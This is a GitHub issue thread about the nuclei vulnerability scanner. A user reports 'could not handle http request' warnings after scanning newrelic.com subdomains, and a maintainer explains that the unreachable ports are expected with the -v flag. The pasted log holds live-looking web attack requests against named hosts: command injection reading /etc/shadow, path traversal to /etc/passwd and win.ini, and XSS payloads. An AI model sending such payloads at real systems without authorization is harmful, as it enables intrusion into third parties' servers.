### ISSUE TITLE
[issue]could not handle http request

### ISSUE THREAD

**Issue by shivammusic** [projectdiscovery/nuclei#275]
**Describe the bug**
**Command was**
subfinder -d newrelic.com -silent | httpx -silent | nuclei -t /root/nuclei-templates/cves/ -o /root/Desktop/Newrelic/ResultsN/cvelikeharsh.txt -v

**O/p**
[http-request] Sent HTTP request to https://infrastructurautodiscover.service.newrelic.com
[WRN] Could not execute step: could not handle http request: Could not do request: GET https://collector-165.newrelic.com:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow giving up after 2 attempts: Get "https://collector-165.newrelic.com:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[http-request] Sent HTTP request to https://infrastructurautodiscover.service.newrelic.com
[WRN] Could not execute step: could not handle http request: Could not do request: GET https://nerd-graph.service.newrelic.com:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini giving up after 2 attempts: Get "https://nerd-graph.service.newrelic.com:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[WRN] Could not execute step: could not handle http request: Could not do request: GET https://collector-165.newrelic.com:8080/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html giving up after 2 attempts: Get "https://collector-165.newrelic.com:8080/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[WRN] Could not execute step: could not handle http request: Could not do request: POST https://nerd-graph.service.newrelic.com:8080/webtools/control/xmlrpc giving up after 2 attempts: Post "https://nerd-graph.service.newrelic.com:8080/webtools/control/xmlrpc": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[WRN] Could not execute step: could not handle http request: Could not do request: POST https://nerd-graph.service.newrelic.com:7001/_async/AsyncResponseService giving up after 2 attempts: Post "https://nerd-graph.service.newrelic.com:7001/_async/AsyncResponseService": dial tcp 162.247.242.38:7001: i/o timeout (Client.Timeout exceeded while awaiting headers)
[WRN] Could not execute step: could not handle http request: Could not do request: GET https://nerd-graph.service.newrelic.com:8080/index.jsp giving up after 2 attempts: Get "https://nerd-graph.service.newrelic.com:8080/index.jsp": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[WRN] Could not execute step: could not handle http request: Could not do request: POST https://nerd-graph.service.newrelic.com:5601/api/timelion/run giving up after 2 attempts: Post "https://nerd-graph.service.newrelic.com:5601/api/timelion/run": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[WRN] Could not execute step: could not handle http request: Could not do request: POST https://infrastructurautodiscover.service.newrelic.com:80/api/jsonws/invoke giving up after 2 attempts: Post "https://infrastructurautodiscover.service.newrelic.com:80/api/jsonws/invoke": read tcp 192.168.0.108:38892->162.247.242.38:80: read: connection reset by peer
[WRN] Could not execute step: could not handle http request: Could not do request: GET https://nerd-graph.service.newrelic.com:32000/webmail/?color="><svg/onload=alert(document.domain)>" giving up after 2 attempts: Get "https://nerd-graph.service.newrelic.com:32000/webmail/?color=\"><svg/onload=alert(document.domain)>\"": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[WRN] Could not execute step: could not handle http request: Could not do request: GET https://nerd-graph.service.newrelic.com:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development giving up after 2 attempts: Get "https://nerd-graph.service.newrelic.com:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[http-request] Sent HTTP request to https://infrastructurautodiscover.service.newrelic.com
[WRN] Could not execute step: could not handle http request: context deadline exceeded (Client.Timeout or context cancellation while reading body)
[WRN] Could not execute step: could not handle http request: Could not do request: GET https://nerd-graph.service.newrelic.com:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow giving up after 2 attempts: Get "https://nerd-graph.service.newrelic.com:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[http-request] Sent HTTP request to https://infrastructurautodiscover.service.newrelic.com
so on....
[INF] No results found. Happy hacking!

**Nuclei version**
v2.1.0

**Comment by bauthard** [comment]
Hey @shivammusic, 

This is not an issue or bug, you are using `-v` flag which shows all valid and **invalid** requests, as you can see in the error, the requested URLs are not reachable on defined **ports** hence the `WRN` for the same.
